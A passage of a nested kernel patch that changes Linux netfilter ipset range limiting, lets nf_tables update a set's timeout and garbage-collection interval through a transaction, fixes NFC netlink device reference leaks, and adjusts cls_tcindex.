+-		ipn = ip_set_range_to_cidr(ipn, ip_to, &e.cidr);
+-		n++;
+-	} while (ipn++ < ip_to);
+-
+-	if (n > IPSET_MAX_RANGE)
+-		return -ERANGE;
+ 
+ 	if (retried)
+ 		ip = ntohl(h->next.ip);
+ 	do {
++		i++;
+ 		e.ip = htonl(ip);
++		if (i > IPSET_MAX_RANGE) {
++			hash_netiface4_data_next(&h->next, &e);
++			return -ERANGE;
++		}
+ 		ip = ip_set_range_to_cidr(ip, ip_to, &e.cidr);
+ 		ret = adtfn(set, &e, &ext, &ext, flags);
+ 
+diff --git a/net/netfilter/ipset/ip_set_hash_netnet.c b/net/netfilter/ipset/ip_set_hash_netnet.c
+index 3d09eefe998a7..c07b70bf32db4 100644
+--- a/net/netfilter/ipset/ip_set_hash_netnet.c
++++ b/net/netfilter/ipset/ip_set_hash_netnet.c
+@@ -163,13 +163,12 @@ static int
+ hash_netnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		  enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_netnet4 *h = set->data;
++	struct hash_netnet4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_netnet4_elem e = { };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+ 	u32 ip = 0, ip_to = 0;
+-	u32 ip2 = 0, ip2_from = 0, ip2_to = 0, ipn;
+-	u64 n = 0, m = 0;
++	u32 ip2 = 0, ip2_from = 0, ip2_to = 0, i = 0;
+ 	int ret;
+ 
+ 	if (tb[IPSET_ATTR_LINENO])
+@@ -245,19 +244,6 @@ hash_netnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 	} else {
+ 		ip_set_mask_from_to(ip2_from, ip2_to, e.cidr[1]);
+ 	}
+-	ipn = ip;
+-	do {
+-		ipn = ip_set_range_to_cidr(ipn, ip_to, &e.cidr[0]);
+-		n++;
+-	} while (ipn++ < ip_to);
+-	ipn = ip2_from;
+-	do {
+-		ipn = ip_set_range_to_cidr(ipn, ip2_to, &e.cidr[1]);
+-		m++;
+-	} while (ipn++ < ip2_to);
+-
+-	if (n*m > IPSET_MAX_RANGE)
+-		return -ERANGE;
+ 
+ 	if (retried) {
+ 		ip = ntohl(h->next.ip[0]);
+@@ -270,7 +256,12 @@ hash_netnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		e.ip[0] = htonl(ip);
+ 		ip = ip_set_range_to_cidr(ip, ip_to, &e.cidr[0]);
+ 		do {
++			i++;
+ 			e.ip[1] = htonl(ip2);
++			if (i > IPSET_MAX_RANGE) {
++				hash_netnet4_data_next(&h->next, &e);
++				return -ERANGE;
++			}
+ 			ip2 = ip_set_range_to_cidr(ip2, ip2_to, &e.cidr[1]);
+ 			ret = adtfn(set, &e, &ext, &ext, flags);
+ 			if (ret && !ip_set_eexist(ret, flags))
+diff --git a/net/netfilter/ipset/ip_set_hash_netport.c b/net/netfilter/ipset/ip_set_hash_netport.c
+index 09cf72eb37f8d..d1a0628df4ef3 100644
+--- a/net/netfilter/ipset/ip_set_hash_netport.c
++++ b/net/netfilter/ipset/ip_set_hash_netport.c
+@@ -154,12 +154,11 @@ static int
+ hash_netport4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		   enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_netport4 *h = set->data;
++	struct hash_netport4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_netport4_elem e = { .cidr = HOST_MASK - 1 };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+-	u32 port, port_to, p = 0, ip = 0, ip_to = 0, ipn;
+-	u64 n = 0;
++	u32 port, port_to, p = 0, ip = 0, ip_to = 0, i = 0;
+ 	bool with_ports = false;
+ 	u8 cidr;
+ 	int ret;
+@@ -236,14 +235,6 @@ hash_netport4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 	} else {
+ 		ip_set_mask_from_to(ip, ip_to, e.cidr + 1);
+ 	}
+-	ipn = ip;
+-	do {
+-		ipn = ip_set_range_to_cidr(ipn, ip_to, &cidr);
+-		n++;
+-	} while (ipn++ < ip_to);
+-
+-	if (n*(port_to - port + 1) > IPSET_MAX_RANGE)
+-		return -ERANGE;
+ 
+ 	if (retried) {
+ 		ip = ntohl(h->next.ip);
+@@ -255,8 +246,12 @@ hash_netport4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		e.ip = htonl(ip);
+ 		ip = ip_set_range_to_cidr(ip, ip_to, &cidr);
+ 		e.cidr = cidr - 1;
+-		for (; p <= port_to; p++) {
++		for (; p <= port_to; p++, i++) {
+ 			e.port = htons(p);
++			if (i > IPSET_MAX_RANGE) {
++				hash_netport4_data_next(&h->next, &e);
++				return -ERANGE;
++			}
+ 			ret = adtfn(set, &e, &ext, &ext, flags);
+ 			if (ret && !ip_set_eexist(ret, flags))
+ 				return ret;
+diff --git a/net/netfilter/ipset/ip_set_hash_netportnet.c b/net/netfilter/ipset/ip_set_hash_netportnet.c
+index 19bcdb3141f6e..005a7ce87217e 100644
+--- a/net/netfilter/ipset/ip_set_hash_netportnet.c
++++ b/net/netfilter/ipset/ip_set_hash_netportnet.c
+@@ -173,17 +173,26 @@ hash_netportnet4_kadt(struct ip_set *set, const struct sk_buff *skb,
+ 	return adtfn(set, &e, &ext, &opt->ext, opt->cmdflags);
+ }
+ 
++static u32
++hash_netportnet4_range_to_cidr(u32 from, u32 to, u8 *cidr)
++{
++	if (from == 0 && to == UINT_MAX) {
++		*cidr = 0;
++		return to;
++	}
++	return ip_set_range_to_cidr(from, to, cidr);
++}
++
+ static int
+ hash_netportnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		      enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_netportnet4 *h = set->data;
++	struct hash_netportnet4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_netportnet4_elem e = { };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+ 	u32 ip = 0, ip_to = 0, p = 0, port, port_to;
+-	u32 ip2_from = 0, ip2_to = 0, ip2, ipn;
+-	u64 n = 0, m = 0;
++	u32 ip2_from = 0, ip2_to = 0, ip2, i = 0;
+ 	bool with_ports = false;
+ 	int ret;
+ 
+@@ -285,19 +294,6 @@ hash_netportnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 	} else {
+ 		ip_set_mask_from_to(ip2_from, ip2_to, e.cidr[1]);
+ 	}
+-	ipn = ip;
+-	do {
+-		ipn = ip_set_range_to_cidr(ipn, ip_to, &e.cidr[0]);
+-		n++;
+-	} while (ipn++ < ip_to);
+-	ipn = ip2_from;
+-	do {
+-		ipn = ip_set_range_to_cidr(ipn, ip2_to, &e.cidr[1]);
+-		m++;
+-	} while (ipn++ < ip2_to);
+-
+-	if (n*m*(port_to - port + 1) > IPSET_MAX_RANGE)
+-		return -ERANGE;
+ 
+ 	if (retried) {
+ 		ip = ntohl(h->next.ip[0]);
+@@ -310,13 +306,19 @@ hash_netportnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 
+ 	do {
+ 		e.ip[0] = htonl(ip);
+-		ip = ip_set_range_to_cidr(ip, ip_to, &e.cidr[0]);
++		ip = hash_netportnet4_range_to_cidr(ip, ip_to, &e.cidr[0]);
+ 		for (; p <= port_to; p++) {
+ 			e.port = htons(p);
+ 			do {
++				i++;
+ 				e.ip[1] = htonl(ip2);
+-				ip2 = ip_set_range_to_cidr(ip2, ip2_to,
+-							   &e.cidr[1]);
++				if (i > IPSET_MAX_RANGE) {
++					hash_netportnet4_data_next(&h->next,
++								   &e);
++					return -ERANGE;
++				}
++				ip2 = hash_netportnet4_range_to_cidr(ip2,
++							ip2_to, &e.cidr[1]);
+ 				ret = adtfn(set, &e, &ext, &ext, flags);
+ 				if (ret && !ip_set_eexist(ret, flags))
+ 					return ret;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 7a09421f19e15..3ba8c291fcaa7 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -465,8 +465,9 @@ static int nft_delrule_by_chain(struct nft_ctx *ctx)
+ 	return 0;
+ }
+ 
+-static int nft_trans_set_add(const struct nft_ctx *ctx, int msg_type,
+-			     struct nft_set *set)
++static int __nft_trans_set_add(const struct nft_ctx *ctx, int msg_type,
++			       struct nft_set *set,
++			       const struct nft_set_desc *desc)
+ {
+ 	struct nft_trans *trans;
+ 
+@@ -474,17 +475,28 @@ static int nft_trans_set_add(const struct nft_ctx *ctx, int msg_type,
+ 	if (trans == NULL)
+ 		return -ENOMEM;
+ 
+-	if (msg_type == NFT_MSG_NEWSET && ctx->nla[NFTA_SET_ID] != NULL) {
++	if (msg_type == NFT_MSG_NEWSET && ctx->nla[NFTA_SET_ID] && !desc) {
+ 		nft_trans_set_id(trans) =
+ 			ntohl(nla_get_be32(ctx->nla[NFTA_SET_ID]));
+ 		nft_activate_next(ctx->net, set);
+ 	}
+ 	nft_trans_set(trans) = set;
++	if (desc) {
++		nft_trans_set_update(trans) = true;
++		nft_trans_set_gc_int(trans) = desc->gc_int;
++		nft_trans_set_timeout(trans) = desc->timeout;
++	}
+ 	nft_trans_commit_list_add_tail(ctx->net, trans);
+ 
+ 	return 0;
+ }
+ 
++static int nft_trans_set_add(const struct nft_ctx *ctx, int msg_type,
++			     struct nft_set *set)
++{
++	return __nft_trans_set_add(ctx, msg_type, set, NULL);
++}
++
+ static int nft_delset(const struct nft_ctx *ctx, struct nft_set *set)
+ {
+ 	int err;
+@@ -3732,8 +3744,7 @@ static bool nft_set_ops_candidate(const struct nft_set_type *type, u32 flags)
+ static const struct nft_set_ops *
+ nft_select_set_ops(const struct nft_ctx *ctx,
+ 		   const struct nlattr * const nla[],
+-		   const struct nft_set_desc *desc,
+-		   enum nft_set_policies policy)
++		   const struct nft_set_desc *desc)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(ctx->net);
+ 	const struct nft_set_ops *ops, *bops;
+@@ -3762,7 +3773,7 @@ nft_select_set_ops(const struct nft_ctx *ctx,
+ 		if (!ops->estimate(desc, flags, &est))
+ 			continue;
+ 
+-		switch (policy) {
++		switch (desc->policy) {
+ 		case NFT_SET_POL_PERFORMANCE:
+ 			if (est.lookup < best.lookup)
+ 				break;
+@@ -3997,8 +4008,10 @@ static int nf_tables_fill_set_concat(struct sk_buff *skb,
+ static int nf_tables_fill_set(struct sk_buff *skb, const struct nft_ctx *ctx,
+ 			      const struct nft_set *set, u16 event, u16 flags)
+ {
+-	struct nlmsghdr *nlh;
++	u64 timeout = READ_ONCE(set->timeout);
++	u32 gc_int = READ_ONCE(set->gc_int);
+ 	u32 portid = ctx->portid;
++	struct nlmsghdr *nlh;
+ 	struct nlattr *nest;
+ 	u32 seq = ctx->seq;
+ 	int i;
+@@ -4034,13 +4047,13 @@ static int nf_tables_fill_set(struct sk_buff *skb, const struct nft_ctx *ctx,
+ 	    nla_put_be32(skb, NFTA_SET_OBJ_TYPE, htonl(set->objtype)))
+ 		goto nla_put_failure;
+ 
+-	if (set->timeout &&
++	if (timeout &&
+ 	    nla_put_be64(skb, NFTA_SET_TIMEOUT,
+-			 nf_jiffies64_to_msecs(set->timeout),
++			 nf_jiffies64_to_msecs(timeout),
+ 			 NFTA_SET_PAD))
+ 		goto nla_put_failure;
+-	if (set->gc_int &&
+-	    nla_put_be32(skb, NFTA_SET_GC_INTERVAL, htonl(set->gc_int)))
++	if (gc_int &&
++	    nla_put_be32(skb, NFTA_SET_GC_INTERVAL, htonl(gc_int)))
+ 		goto nla_put_failure;
+ 
+ 	if (set->policy != NFT_SET_POL_PERFORMANCE) {
+@@ -4341,15 +4354,94 @@ static int nf_tables_set_desc_parse(struct nft_set_desc *desc,
+ 	return err;
+ }
+ 
++static int nft_set_expr_alloc(struct nft_ctx *ctx, struct nft_set *set,
++			      const struct nlattr * const *nla,
++			      struct nft_expr **exprs, int *num_exprs,
++			      u32 flags)
++{
++	struct nft_expr *expr;
++	int err, i;
++
++	if (nla[NFTA_SET_EXPR]) {
++		expr = nft_set_elem_expr_alloc(ctx, set, nla[NFTA_SET_EXPR]);
++		if (IS_ERR(expr)) {
++			err = PTR_ERR(expr);
++			goto err_set_expr_alloc;
++		}
++		exprs[0] = expr;
++		(*num_exprs)++;
++	} else if (nla[NFTA_SET_EXPRESSIONS]) {
++		struct nlattr *tmp;
++		int left;
++
++		if (!(flags & NFT_SET_EXPR)) {
++			err = -EINVAL;
++			goto err_set_expr_alloc;
++		}
++		i = 0;
++		nla_for_each_nested(tmp, nla[NFTA_SET_EXPRESSIONS], left) {
++			if (i == NFT_SET_EXPR_MAX) {
++				err = -E2BIG;
++				goto err_set_expr_alloc;
++			}
++			if (nla_type(tmp) != NFTA_LIST_ELEM) {
++				err = -EINVAL;
++				goto err_set_expr_alloc;
++			}
++			expr = nft_set_elem_expr_alloc(ctx, set, tmp);
++			if (IS_ERR(expr)) {
++				err = PTR_ERR(expr);
++				goto err_set_expr_alloc;
++			}
++			exprs[i++] = expr;
++			(*num_exprs)++;
++		}
++	}
++
++	return 0;
++
++err_set_expr_alloc:
++	for (i = 0; i < *num_exprs; i++)
++		nft_expr_destroy(ctx, exprs[i]);
++
++	return err;
++}
++
++static bool nft_set_is_same(const struct nft_set *set,
++			    const struct nft_set_desc *desc,
++			    struct nft_expr *exprs[], u32 num_exprs, u32 flags)
++{
++	int i;
++
++	if (set->ktype != desc->ktype ||
++	    set->dtype != desc->dtype ||
++	    set->flags != flags ||
++	    set->klen != desc->klen ||
++	    set->dlen != desc->dlen ||
++	    set->field_count != desc->field_count ||
++	    set->num_exprs != num_exprs)
++		return false;
++
++	for (i = 0; i < desc->field_count; i++) {
++		if (set->field_len[i] != desc->field_len[i])
++			return false;
++	}
++
++	for (i = 0; i < num_exprs; i++) {
++		if (set->exprs[i]->ops != exprs[i]->ops)
++			return false;
++	}
++
++	return true;
++}
++
+ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 			    const struct nlattr * const nla[])
+ {
+-	u32 ktype, dtype, flags, policy, gc_int, objtype;
+ 	struct netlink_ext_ack *extack = info->extack;
+ 	u8 genmask = nft_genmask_next(info->net);
+ 	u8 family = info->nfmsg->nfgen_family;
+ 	const struct nft_set_ops *ops;
+-	struct nft_expr *expr = NULL;
+ 	struct net *net = info->net;
+ 	struct nft_set_desc desc;
+ 	struct nft_table *table;
+@@ -4357,10 +4449,11 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 	struct nft_set *set;
+ 	struct nft_ctx ctx;
+ 	size_t alloc_size;
+-	u64 timeout;
++	int num_exprs = 0;
+ 	char *name;
+ 	int err, i;
+ 	u16 udlen;
++	u32 flags;
+ 	u64 size;
+ 
+ 	if (nla[NFTA_SET_TABLE] == NULL ||
+@@ -4371,10 +4464,10 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 
+ 	memset(&desc, 0, sizeof(desc));
+ 
+-	ktype = NFT_DATA_VALUE;
++	desc.ktype = NFT_DATA_VALUE;
+ 	if (nla[NFTA_SET_KEY_TYPE] != NULL) {
+-		ktype = ntohl(nla_get_be32(nla[NFTA_SET_KEY_TYPE]));
+-		if ((ktype & NFT_DATA_RESERVED_MASK) == NFT_DATA_RESERVED_MASK)
++		desc.ktype = ntohl(nla_get_be32(nla[NFTA_SET_KEY_TYPE]));
++		if ((desc.ktype & NFT_DATA_RESERVED_MASK) == NFT_DATA_RESERVED_MASK)
+ 			return -EINVAL;
+ 	}
+ 
+@@ -4399,17 +4492,17 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 			return -EOPNOTSUPP;
+ 	}
+ 
+-	dtype = 0;
++	desc.dtype = 0;
+ 	if (nla[NFTA_SET_DATA_TYPE] != NULL) {
+ 		if (!(flags & NFT_SET_MAP))
+ 			return -EINVAL;
+ 
+-		dtype = ntohl(nla_get_be32(nla[NFTA_SET_DATA_TYPE]));
+-		if ((dtype & NFT_DATA_RESERVED_MASK) == NFT_DATA_RESERVED_MASK &&
+-		    dtype != NFT_DATA_VERDICT)
++		desc.dtype = ntohl(nla_get_be32(nla[NFTA_SET_DATA_TYPE]));
++		if ((desc.dtype & NFT_DATA_RESERVED_MASK) == NFT_DATA_RESERVED_MASK &&
++		    desc.dtype != NFT_DATA_VERDICT)
+ 			return -EINVAL;
+ 
+-		if (dtype != NFT_DATA_VERDICT) {
++		if (desc.dtype != NFT_DATA_VERDICT) {
+ 			if (nla[NFTA_SET_DATA_LEN] == NULL)
+ 				return -EINVAL;
+ 			desc.dlen = ntohl(nla_get_be32(nla[NFTA_SET_DATA_LEN]));
+@@ -4424,34 +4517,34 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 		if (!(flags & NFT_SET_OBJECT))
+ 			return -EINVAL;
+ 
+-		objtype = ntohl(nla_get_be32(nla[NFTA_SET_OBJ_TYPE]));
+-		if (objtype == NFT_OBJECT_UNSPEC ||
+-		    objtype > NFT_OBJECT_MAX)
++		desc.objtype = ntohl(nla_get_be32(nla[NFTA_SET_OBJ_TYPE]));
++		if (desc.objtype == NFT_OBJECT_UNSPEC ||
++		    desc.objtype > NFT_OBJECT_MAX)
+ 			return -EOPNOTSUPP;
+ 	} else if (flags & NFT_SET_OBJECT)
+ 		return -EINVAL;
+ 	else
+-		objtype = NFT_OBJECT_UNSPEC;
++		desc.objtype = NFT_OBJECT_UNSPEC;
+ 
+-	timeout = 0;
++	desc.timeout = 0;
+ 	if (nla[NFTA_SET_TIMEOUT] != NULL) {
+ 		if (!(flags & NFT_SET_TIMEOUT))
+ 			return -EINVAL;
+ 
+-		err = nf_msecs_to_jiffies64(nla[NFTA_SET_TIMEOUT], &timeout);
++		err = nf_msecs_to_jiffies64(nla[NFTA_SET_TIMEOUT], &desc.timeout);
+ 		if (err)
+ 			return err;
+ 	}
+-	gc_int = 0;
++	desc.gc_int = 0;
+ 	if (nla[NFTA_SET_GC_INTERVAL] != NULL) {
+ 		if (!(flags & NFT_SET_TIMEOUT))
+ 			return -EINVAL;
+-		gc_int = ntohl(nla_get_be32(nla[NFTA_SET_GC_INTERVAL]));
++		desc.gc_int = ntohl(nla_get_be32(nla[NFTA_SET_GC_INTERVAL]));
+ 	}
+ 
+-	policy = NFT_SET_POL_PERFORMANCE;
++	desc.policy = NFT_SET_POL_PERFORMANCE;
+ 	if (nla[NFTA_SET_POLICY] != NULL)
+-		policy = ntohl(nla_get_be32(nla[NFTA_SET_POLICY]));
++		desc.policy = ntohl(nla_get_be32(nla[NFTA_SET_POLICY]));
+ 
+ 	if (nla[NFTA_SET_DESC] != NULL) {
+ 		err = nf_tables_set_desc_parse(&desc, nla[NFTA_SET_DESC]);
+@@ -4483,6 +4576,8 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 			return PTR_ERR(set);
+ 		}
+ 	} else {
++		struct nft_expr *exprs[NFT_SET_EXPR_MAX] = {};
++
+ 		if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
+ 			NL_SET_BAD_ATTR(extack, nla[NFTA_SET_NAME]);
+ 			return -EEXIST;
+@@ -4490,13 +4585,29 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 		if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
+ 			return -EOPNOTSUPP;
+ 
+-		return 0;
++		err = nft_set_expr_alloc(&ctx, set, nla, exprs, &num_exprs, flags);
++		if (err < 0)
++			return err;
++
++		err = 0;
++		if (!nft_set_is_same(set, &desc, exprs, num_exprs, flags)) {
++			NL_SET_BAD_ATTR(extack, nla[NFTA_SET_NAME]);
++			err = -EEXIST;
++		}
++
++		for (i = 0; i < num_exprs; i++)
++			nft_expr_destroy(&ctx, exprs[i]);
++
++		if (err < 0)
++			return err;
++
++		return __nft_trans_set_add(&ctx, NFT_MSG_NEWSET, set, &desc);
+ 	}
+ 
+ 	if (!(info->nlh->nlmsg_flags & NLM_F_CREATE))
+ 		return -ENOENT;
+ 
+-	ops = nft_select_set_ops(&ctx, nla, &desc, policy);
++	ops = nft_select_set_ops(&ctx, nla, &desc);
+ 	if (IS_ERR(ops))
+ 		return PTR_ERR(ops);
+ 
+@@ -4536,18 +4647,18 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 	set->table = table;
+ 	write_pnet(&set->net, net);
+ 	set->ops = ops;
+-	set->ktype = ktype;
++	set->ktype = desc.ktype;
+ 	set->klen = desc.klen;
+-	set->dtype = dtype;
+-	set->objtype = objtype;
++	set->dtype = desc.dtype;
++	set->objtype = desc.objtype;
+ 	set->dlen = desc.dlen;
+ 	set->flags = flags;
+ 	set->size = desc.size;
+-	set->policy = policy;
++	set->policy = desc.policy;
+ 	set->udlen = udlen;
+ 	set->udata = udata;
+-	set->timeout = timeout;
+-	set->gc_int = gc_int;
++	set->timeout = desc.timeout;
++	set->gc_int = desc.gc_int;
+ 
+ 	set->field_count = desc.field_count;
+ 	for (i = 0; i < desc.field_count; i++)
+@@ -4557,43 +4668,11 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 	if (err < 0)
+ 		goto err_set_init;
+ 
+-	if (nla[NFTA_SET_EXPR]) {
+-		expr = nft_set_elem_expr_alloc(&ctx, set, nla[NFTA_SET_EXPR]);
+-		if (IS_ERR(expr)) {
+-			err = PTR_ERR(expr);
+-			goto err_set_expr_alloc;
+-		}
+-		set->exprs[0] = expr;
+-		set->num_exprs++;
+-	} else if (nla[NFTA_SET_EXPRESSIONS]) {
+-		struct nft_expr *expr;
+-		struct nlattr *tmp;
+-		int left;
+-
+-		if (!(flags & NFT_SET_EXPR)) {
+-			err = -EINVAL;
+-			goto err_set_expr_alloc;
+-		}
+-		i = 0;
+-		nla_for_each_nested(tmp, nla[NFTA_SET_EXPRESSIONS], left) {
+-			if (i == NFT_SET_EXPR_MAX) {
+-				err = -E2BIG;
+-				goto err_set_expr_alloc;
+-			}
+-			if (nla_type(tmp) != NFTA_LIST_ELEM) {
+-				err = -EINVAL;
+-				goto err_set_expr_alloc;
+-			}
+-			expr = nft_set_elem_expr_alloc(&ctx, set, tmp);
+-			if (IS_ERR(expr)) {
+-				err = PTR_ERR(expr);
+-				goto err_set_expr_alloc;
+-			}
+-			set->exprs[i++] = expr;
+-			set->num_exprs++;
+-		}
+-	}
++	err = nft_set_expr_alloc(&ctx, set, nla, set->exprs, &num_exprs, flags);
++	if (err < 0)
++		goto err_set_destroy;
+ 
++	set->num_exprs = num_exprs;
+ 	set->handle = nf_tables_alloc_handle(table);
+ 
+ 	err = nft_trans_set_add(&ctx, NFT_MSG_NEWSET, set);
+@@ -4607,7 +4686,7 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ err_set_expr_alloc:
+ 	for (i = 0; i < set->num_exprs; i++)
+ 		nft_expr_destroy(&ctx, set->exprs[i]);
+-
++err_set_destroy:
+ 	ops->destroy(set);
+ err_set_init:
+ 	kfree(set->name);
+@@ -5960,7 +6039,7 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 			return err;
+ 	} else if (set->flags & NFT_SET_TIMEOUT &&
+ 		   !(flags & NFT_SET_ELEM_INTERVAL_END)) {
+-		timeout = set->timeout;
++		timeout = READ_ONCE(set->timeout);
+ 	}
+ 
+ 	expiration = 0;
+@@ -6061,7 +6140,7 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 		if (err < 0)
+ 			goto err_parse_key_end;
+ 
+-		if (timeout != set->timeout) {
++		if (timeout != READ_ONCE(set->timeout)) {
+ 			err = nft_set_ext_add(&tmpl, NFT_SET_EXT_TIMEOUT);
+ 			if (err < 0)
+ 				goto err_parse_key_end;
+@@ -8977,14 +9056,20 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 				nft_flow_rule_destroy(nft_trans_flow_rule(trans));
+ 			break;
+ 		case NFT_MSG_NEWSET:
+-			nft_clear(net, nft_trans_set(trans));
+-			/* This avoids hitting -EBUSY when deleting the table
+-			 * from the transaction.
+-			 */
+-			if (nft_set_is_anonymous(nft_trans_set(trans)) &&
+-			    !list_empty(&nft_trans_set(trans)->bindings))
+-				trans->ctx.table->use--;
++			if (nft_trans_set_update(trans)) {
++				struct nft_set *set = nft_trans_set(trans);
+ 
++				WRITE_ONCE(set->timeout, nft_trans_set_timeout(trans));
++				WRITE_ONCE(set->gc_int, nft_trans_set_gc_int(trans));
++			} else {
++				nft_clear(net, nft_trans_set(trans));
++				/* This avoids hitting -EBUSY when deleting the table
++				 * from the transaction.
++				 */
++				if (nft_set_is_anonymous(nft_trans_set(trans)) &&
++				    !list_empty(&nft_trans_set(trans)->bindings))
++					trans->ctx.table->use--;
++			}
+ 			nf_tables_set_notify(&trans->ctx, nft_trans_set(trans),
+ 					     NFT_MSG_NEWSET, GFP_KERNEL);
+ 			nft_trans_destroy(trans);
+@@ -9206,6 +9291,10 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 			nft_trans_destroy(trans);
+ 			break;
+ 		case NFT_MSG_NEWSET:
++			if (nft_trans_set_update(trans)) {
++				nft_trans_destroy(trans);
++				break;
++			}
+ 			trans->ctx.table->use--;
+ 			if (nft_trans_set_bound(trans)) {
+ 				nft_trans_destroy(trans);
+diff --git a/net/nfc/netlink.c b/net/nfc/netlink.c
+index 9d91087b93992..1fc339084d897 100644
+--- a/net/nfc/netlink.c
++++ b/net/nfc/netlink.c
+@@ -1497,6 +1497,7 @@ static int nfc_genl_se_io(struct sk_buff *skb, struct genl_info *info)
+ 	u32 dev_idx, se_idx;
+ 	u8 *apdu;
+ 	size_t apdu_len;
++	int rc;
+ 
+ 	if (!info->attrs[NFC_ATTR_DEVICE_INDEX] ||
+ 	    !info->attrs[NFC_ATTR_SE_INDEX] ||
+@@ -1510,25 +1511,37 @@ static int nfc_genl_se_io(struct sk_buff *skb, struct genl_info *info)
+ 	if (!dev)
+ 		return -ENODEV;
+ 
+-	if (!dev->ops || !dev->ops->se_io)
+-		return -ENOTSUPP;
++	if (!dev->ops || !dev->ops->se_io) {
++		rc = -EOPNOTSUPP;
++		goto put_dev;
++	}
+ 
+ 	apdu_len = nla_len(info->attrs[NFC_ATTR_SE_APDU]);
+-	if (apdu_len == 0)
+-		return -EINVAL;
++	if (apdu_len == 0) {
++		rc = -EINVAL;
++		goto put_dev;
++	}
+ 
+ 	apdu = nla_data(info->attrs[NFC_ATTR_SE_APDU]);
+-	if (!apdu)
+-		return -EINVAL;
++	if (!apdu) {
++		rc = -EINVAL;
++		goto put_dev;
++	}
+ 
+ 	ctx = kzalloc(sizeof(struct se_io_ctx), GFP_KERNEL);
+-	if (!ctx)
+-		return -ENOMEM;
++	if (!ctx) {
++		rc = -ENOMEM;
++		goto put_dev;
++	}
+ 
+ 	ctx->dev_idx = dev_idx;
+ 	ctx->se_idx = se_idx;
+ 
+-	return nfc_se_io(dev, se_idx, apdu, apdu_len, se_io_cb, ctx);
++	rc = nfc_se_io(dev, se_idx, apdu, apdu_len, se_io_cb, ctx);
++
++put_dev:
++	nfc_put_device(dev);
++	return rc;
+ }
+ 
+ static int nfc_genl_vendor_cmd(struct sk_buff *skb,
+@@ -1551,14 +1564,21 @@ static int nfc_genl_vendor_cmd(struct sk_buff *skb,
+ 	subcmd = nla_get_u32(info->attrs[NFC_ATTR_VENDOR_SUBCMD]);
+ 
+ 	dev = nfc_get_device(dev_idx);
+-	if (!dev || !dev->vendor_cmds || !dev->n_vendor_cmds)
++	if (!dev)
+ 		return -ENODEV;
+ 
++	if (!dev->vendor_cmds || !dev->n_vendor_cmds) {
++		err = -ENODEV;
++		goto put_dev;
++	}
++
+ 	if (info->attrs[NFC_ATTR_VENDOR_DATA]) {
+ 		data = nla_data(info->attrs[NFC_ATTR_VENDOR_DATA]);
+ 		data_len = nla_len(info->attrs[NFC_ATTR_VENDOR_DATA]);
+-		if (data_len == 0)
+-			return -EINVAL;
++		if (data_len == 0) {
++			err = -EINVAL;
++			goto put_dev;
++		}
+ 	} else {
+ 		data = NULL;
+ 		data_len = 0;
+@@ -1573,10 +1593,14 @@ static int nfc_genl_vendor_cmd(struct sk_buff *skb,
+ 		dev->cur_cmd_info = info;
+ 		err = cmd->doit(dev, data, data_len);
+ 		dev->cur_cmd_info = NULL;
+-		return err;
++		goto put_dev;
+ 	}
+ 
+-	return -EOPNOTSUPP;
++	err = -EOPNOTSUPP;
++
++put_dev:
++	nfc_put_device(dev);
++	return err;
+ }
+ 
+ /* message building helper */
+diff --git a/net/sched/cls_tcindex.c b/net/sched/cls_tcindex.c
+index 1c9eeb98d826e..4bdcbee4bec56 100644
+--- a/net/sched/cls_tcindex.c
++++ b/net/sched/cls_tcindex.c
+@@ -332,7 +332,7 @@ tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+ 		  struct tcindex_filter_result *r, struct nlattr **tb,
+ 		  struct nlattr *est, u32 flags, struct netlink_ext_ack *extack)
+ {
+-	struct tcindex_filter_result new_filter_result, *old_r = r;
++	struct tcindex_filter_result new_filter_result;
+ 	struct tcindex_data *cp = NULL, *oldp;
+ 	struct tcindex_filter *f = NULL; /* make gcc behave */
+ 	struct tcf_result cr = {};
+@@ -401,7 +401,7 @@ tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+ 	err = tcindex_filter_result_init(&new_filter_result, cp, net);
+ 	if (err < 0)
+ 		goto errout_alloc;
